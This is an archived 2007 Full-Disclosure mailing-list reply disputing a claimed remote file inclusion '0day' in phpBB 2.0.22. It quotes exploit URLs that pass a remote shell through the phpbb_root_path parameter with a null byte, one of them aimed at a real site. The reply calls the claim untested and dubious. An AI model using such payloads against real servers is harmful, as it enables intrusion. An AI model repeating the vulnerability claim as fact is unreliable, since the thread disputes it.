lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list] 
Date: Sat, 02 Jun 2007 04:14:19 -0400
From: <hardened-php@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Re: 0DAY RFI in phpBB <= 2.0.22 HOT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

"New bug found in phpBB, most pages vulnerable, theres more bugs,
I\'ll post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.sh
ell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[rem
ote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!"

Did you even read the code rezen? test your "vuln"? How about you
test what you find instead of posting everything you see to the
list and trying to get attention/fame? Leave vuln assessment/code
auditing to people who actually care about it, and stop playing as
one.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkZhJdIACgkQMe2+mPigEXJ5awP+Iqd9pRIypATEnM1K7ZhpAjxPgJeY
NedFd4Dkf6EgeQFy0zY2qGHM24CrbHO27bfsM2tRbUIdxUbGjD+f5pQ1hGjEF0Mg6Jw0
cBoER8jhWMiZZRxlseaKtkL7t8iF4DsZq5OIdrbHEm4oGpudHE0FKpJFyLsR8Tk85ziA
Icd6qcQ=
=Rhg/
-----END PGP SIGNATURE-----

--
Prices, software, charts & analysis.  Click here to open your online FX trading account.
http://tagline.hushmail.com/fc/CAaCXv1QmGxJYt2brAIxTpm5SofhvHbE/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux